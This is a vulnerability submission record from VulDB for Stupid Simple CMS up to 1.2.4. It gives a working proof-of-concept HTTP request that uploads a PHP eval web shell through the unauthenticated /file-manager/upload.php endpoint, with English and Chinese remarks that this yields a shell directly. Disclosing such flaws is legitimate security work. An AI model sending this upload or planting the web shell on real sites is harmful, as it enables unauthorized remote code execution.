| Título | Stupid-Simple-CMS Stupid-Simple-CMS <=1.2.4 Unauthorized file upload getshell |
|---|
| Descripción | product: Stupid Simple CMS ( Blogger )
download link: https://github.com/codelyfe/Stupid-Simple-CMS
version:<=1.2.4
POC:
```shell
POST http://127.0.0.1/file-manager/upload.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 218
sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypgrUEkuaER8vFmOt
Origin: http://127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1/file-manager/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundarypgrUEkuaER8vFmOt
Content-Disposition: form-data; name="file"; filename="shell2.php"
Content-Type: image/png
<?php eval(@$_POST['password1']);?>
------WebKitFormBoundarypgrUEkuaER8vFmOt--
```
You can getshell directly.
Code audit found that the file upload interface has no authentication measures, which can lead to arbitrary file upload getshell.
可以直接getshell
代码审计发现文件上传接口无鉴权措施,可导致任意文件上传getshell
Local tests can be done by getshell:
本地测试可以getshell:
|
|---|
| Fuente | ⚠️ https://github.com/g1an123/POC/blob/main/Unauthorized%20file%20upload%20getshell.md |
|---|
| Usuario | ggbot (UID 59864) |
|---|
| Sumisión | 2023-12-14 04:21 (hace 3 años) |
|---|
| Moderación | 2023-12-16 20:43 (3 days later) |
|---|
| Estado | Aceptado |
|---|
| Entrada de VulDB | 248260 [codelyfe Stupid Simple CMS hasta 1.2.4 /file-manager/upload.php Archivo escalada de privilegios] |
|---|
| Puntos | 20 |
|---|